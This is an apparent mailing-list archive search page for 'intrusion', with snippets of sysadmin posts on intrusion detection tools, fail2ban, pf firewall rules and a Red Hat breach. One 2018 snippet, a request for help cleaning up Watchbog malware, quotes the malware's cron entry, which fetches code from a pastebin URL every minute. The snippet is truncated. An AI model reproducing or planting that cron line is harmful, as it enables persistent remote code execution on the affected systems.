search for: intrusion

Displaying 20 results from an estimated 821 matches for "intrusion".

2010 Mar 04
8
Intrusion Detection
Hello all, I have been exploring the various intrusion detection systems available for the Linux platform and was wondering what ones you all would recommend? I have used AIDE before and while it is extremely easy to setup, it does not support the ability to send alerts as files are changed (allows one to be aware of an intrusion almost immediately)....
2006 Apr 25
2
firewall based antivirus/trojan blocking and intrusion detection [dnk]
Can anyone recommend an opensource package (preferably something centos 4X compatible) that can be used on a (iptables) firewall to block virus/trojan, etc? And maybe something for intrusion detection? Thanks! Dnk
2020 Apr 22
6
Recommendations on intrusion prevention/detection?
Dear all, what are the key strategies for intrusion prevention and detection with dovecot, apart from installing fail2ban? It is a pity that the IMAP protocol does not support 2 factor authentication, which seems to stop 90% of intrusion attempts in their tracks. Without it, if someone has obtained your password and reads your mail without modifying...
2004 Oct 13
1
follow-up on ISA intrusion detection
Hi, I wrote a mail a few days ago concerning my setup with a front/back firewall, shorewall being front and ISA server 2004 acting as back firewall. I said that ISA server is logging some "intrusion attempts" namely requests coming from external interface to the internal network. As this shouldn''t happen (all intrusion attempts should be stopped by shorewall) I begun to study the ISA logs. Some pattern has emerged: A user on the internal network is browsing a site. Aft...
2020 Apr 22
2
Recommendations on intrusion prevention/detection?
...iv dir="auto"><br></div><div dir="auto">Fail2ban triggering after 3 unsuccessful tries and for last iptables if Linux or ipfw If Freebsd</div><div dir="auto"><br></div><div dir="auto">Keep pfsense synced with intrusion lists is an must have.</div><div dir="auto"><br></div><div dir="auto">And for last, bans are not temporary on my setup, are forever, except if an real user after validate his info / data calls to unblock him.<br><br><div data-smartmai...
2004 Oct 19
2
intrusion detection system
Hello to all, I have implemented a new type of intrusion detection system for my Master thesis. I would like to announce this information, in case anyone would be interested in this research. The IDS system is designed as a kernel module for FreeBSD 5.2. It is inspired by the SpamAssassin program, which detects spam by applying a set of tests to eve...
2004 Oct 19
2
new intrusion detection system
Hello to all, I have implemented a new type of intrusion detection system for my Master thesis. I would like to announce this information, in case anyone would be interested in this research. The IDS system is designed as a kernel module for FreeBSD 5.2. It is inspired by the SpamAssassin program, which detects spam by applying a set of tests to eve...
2006 Jan 19
1
Attempted intrusions
I have noticed since commencing posts on this newsgroup, that there has been a significant increase in attempted intrusions, especially port 80. It's a pity that IP addresses are in the NG headers. :) Oygle
2020 Apr 22
0
Recommendations on intrusion prevention/detection?
On 2020-04-22 5:29 a.m., Johannes Rohr wrote: > Dear all, > > what are the key strategies for intrusion prevention and detection with > dovecot, apart from installing fail2ban? > It is a pity that the IMAP protocol does not support 2 factor > authentication, which seems to stop 90% of intrusion attempts in their > tracks. Without it, if someone has obtained your password and reads your &g...
2014 Feb 08
0
Asterisk intrusion detection/prevention, georgaphic IP banning, etc. (new software)
I'm looking for some beta testers to provide feedback on an Asterisk intrusion detection & prevention program we're releasing soon. As a quick overview, the program provides: - banning based on geographic location of source IP (Continent, country, region, city, etc) - detection and banning based on channels in use by a user - detection and banning based on rate of di...
2008 Aug 22
0
CentOS position on systems intrusion at Red Hat
Earlier in the day today Red Hat made an announcement [1] that there had been an intrusion into some of their computer systems last week. In the same announcement they mention that some of the packages for OpenSSH on RHEL-4 ( i386 and x86_64 ) as well as RHEL-5 ( x86_64 ) were signed by the intruder. In their announcement they also clarified that they were confident that none of these, p...
2008 Aug 22
0
CentOS position on systems intrusion at Red Hat
Earlier in the day today Red Hat made an announcement [1] that there had been an intrusion into some of their computer systems last week. In the same announcement they mention that some of the packages for OpenSSH on RHEL-4 ( i386 and x86_64 ) as well as RHEL-5 ( x86_64 ) were signed by the intruder. In their announcement they also clarified that they were confident that none of these, p...
2007 Sep 26
4
Intrusion Detection Systems
...ipts/dictionary attacks on various services. The latest has been against vsftpd, on systems that I can't easily control vs. putting strict limits on ssh. We simply have too many users entering from too many networks many with dynamic IP addresses. Enter.... thinking about LIDS or Log Based Intrusion Detection. I've run across four systems. Blockhosts, DenyHosts, fail2ban and OSSEC. DenyHosts apparently only works with ssh, so I've discounted using that. Is anyone using one of these or something else that I've missed. At present, I'm leaning towards OSSEC for several reason...
2004 Feb 05
1
Norton personal firewall tells me that bad TCP packets are received
...essages I get: TCP non-syn/non-ack packet on invalid connection. Packet has been dropped TCP Source Port: http(80) TCP Destination Port: 2595 TCP Message Flags: 0x00000019 The TCP message Flags varies. I''ve seen 0x00000011, 0x00000010, 0x00000018, 0x00000004, 0x00000014 and 0x00000019. Intrusion: Invalid TCP Flags TCP Source Port: 6881 TCP Destination Port: 4307 TCP Flags invalid: 0x00000015 Here I''ve seen 0x00000712 and 0x00000015. Intrusion: Invalid TCP Source Port TCP Source Port: 0. This is an invalid port number. TCP Destination Port: 6881 Intrusion: Invalid TCP Options T...
2018 Dec 15
7
CentOS 7.5 Linux box got infected with Watchbog malware
Hi, Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently i am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html to carry out the below steps and is done manually. 1)rm -fr /tmp/*timesyncc.service* 2)crontab -e -u apigee delete the cron entry */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget
2011 Feb 04
2
voice quality measurement using dahdi_monitor
hi group , i am working on dahdi_monitor for measuring voice quality , so i want to know that on which data i can tell that this PRI lines are working properly, is there any measurement on basis of that i can make MOS. i am working from last 2-3 days but i only get idea about making .raw file and making .wav file and visulal mode of RX and TX of PRI line. what i want is measurement of voice
2020 Apr 01
0
Can't block intrusion
D'Arcy Cain <darcy at VybeNetworks.com> writes: > I have a script that checks for things like this and adds them to my > packet filter (pf). Everything seems to work up to a point. The IP > address gets added to my AUTOBLOCK table. The second rule, right after > the friends whitelist, blocks any IP in that table. If I try to ping or > traceroute to it I can't get
2020 Apr 01
0
Can't block intrusion
D'Arcy Cain <darcy at VybeNetworks.com> writes: > Here is the first four lines from "pfctl -sr": > > pass in quick on bge0 from <FRIENDS> to any flags S/SA keep state > block drop in log quick on bge0 from <ENEMIES> to any > block drop in log quick on bge0 from <AUTOBLOCK> to any > block drop out log quick on bge0 from any to
2020 Apr 01
0
Can't block intrusion
On 2/04/2020 5:28 AM, Mark Boyce wrote: > On 1 Apr 2020, at 22:14, Greg Troxel <gdt at lexort.com > <mailto:gdt at lexort.com>> wrote: >> >> I think you need to use tcpdump and turn up firewall debugging. > > sngrep is your friend …My bet is UDP vs TCP on firewall rules :-) > > Mark Or the stateful entry still exists when the table entry is updated.
2020 Apr 01
0
Can't block intrusion
On 2020-04-01 16:28, Mark Boyce wrote: > On 1 Apr 2020, at 22:14, Greg Troxel <gdt at lexort.com > <mailto:gdt at lexort.com>> wrote: >> >> I think you need to use tcpdump and turn up firewall debugging. > > sngrep is your friend …My bet is UDP vs TCP on firewall rules :-) block drop in log quick on bge0 from <AUTOBLOCK> to any block drop out log quick